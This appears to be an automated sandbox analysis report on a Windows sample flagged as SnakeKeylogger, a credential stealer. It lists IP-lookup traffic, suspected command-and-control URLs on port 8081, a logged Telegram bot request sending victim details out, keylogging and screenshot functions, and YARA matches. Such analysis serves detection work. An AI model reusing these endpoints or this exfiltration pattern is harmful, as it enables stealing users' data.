Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49745 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20and%20Time:%2026/09/2024%20/%2021:13:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20116938%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 26 Sep 2024 08:33:25 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1737431170.0000000002D68000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1741165267.00000000056D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmE
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1741882938.0000000005712000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1742504415.0000000006E72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20a
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002DB2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CC8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002D72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002D7C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002C10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002C39000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003CEC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003F66000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CC8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003D14000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003E43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003E49000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003E1E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003CA5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003F41000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003CEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003CEC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003F66000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CC8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003C9F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003D14000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003E43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003E49000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003E1E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003CA5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003F41000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4173648860.0000000003CEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002DB2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002CC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe, 00000004.00000002.4171196895.0000000002DAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49764 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3f42e50.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.3da9138.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000002.4169573077.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1738966608.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7252, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe PID: 7472, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 0_2_0128DA4C	0_2_0128DA4C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 0_2_052DB783	0_2_052DB783
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 0_2_052D91C0	0_2_052D91C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 0_2_052D7720	0_2_052D7720
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe	Code function: 0_2_052D7710	0_2_052D7710
